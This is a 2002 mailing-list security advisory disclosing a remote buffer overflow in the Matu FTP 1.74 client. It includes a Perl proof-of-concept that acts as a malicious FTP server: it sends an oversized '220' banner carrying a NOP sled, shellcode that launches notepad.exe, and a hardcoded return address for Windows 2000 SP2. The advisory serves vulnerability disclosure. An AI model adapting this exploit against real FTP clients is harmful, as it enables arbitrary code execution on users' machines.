Matu FTP remote buffer overflow vulnerability /*--------------------------- Description ---------------------------*/ Matu FTP is a Japanese FTP client software for Win32 Platform. We found an exploitable buffer overflow problem in Matu FTP Version 1.74. The buffer overflow occurs when a long string like 220 AAAAAAAAAAAAAAAAA.....AAAAAAAAAAAAAAA<CR><LF> is received by Matu FTP in the beginning of an FTP session. This vulnerability allows malicious FTP server to execute an arbitrary code on client hosts. /*--------------------------- Vendor Status ---------------------------*/ Notified with no response /*--------------------------- POC ---------------------------*/ This exploit code is invoked as an FTP server through inetd. #!/usr/local/bin/perl #------------------------------------------------------ # Matu Ftp Version 1.74 exploit for Windows2000 Professional (SP2) # ( run under inetd ) # written by Kanatoko <anvilat_private> # http://www.jumperz.net/ #------------------------------------------------------ $|=1; #egg written by UNYUN (http://www.shadowpenguin.org/) $egg = "\xEB\x27\x8B\x34\x24\x33\xC9\x33\xD2\xB2"; $egg .= "\x0B\x03\xF2\x88\x0E\x2B\xF2\xB8\xAF\xA7"; $egg .= "\xE6\x77\xB1\x05\xB2\x04\x2B\xE2\x89\x0C"; $egg .= "\x24\x2B\xE2\x89\x34\x24\xFF\xD0\x90\xEB"; $egg .= "\xFD\xE8\xD4\xFF\xFF\xFF"; $egg .= "notepad.exe"; #egg_address = 0x0012F43C $buf = "\x90" x 217; $buf .= $egg; $buf .= "A" x 2; $buf .= "\x3C\xF4\x12\x00"; $buf .= "B" x 80; print "220 $buf\r\n"; -- #sorry for the bad english Kanatoko <anvilat_private> http://www.jumperz.net/(Japanese)
This archive was generated by hypermail 2b30 : Mon Apr 22 2002 - 20:56:59 PDT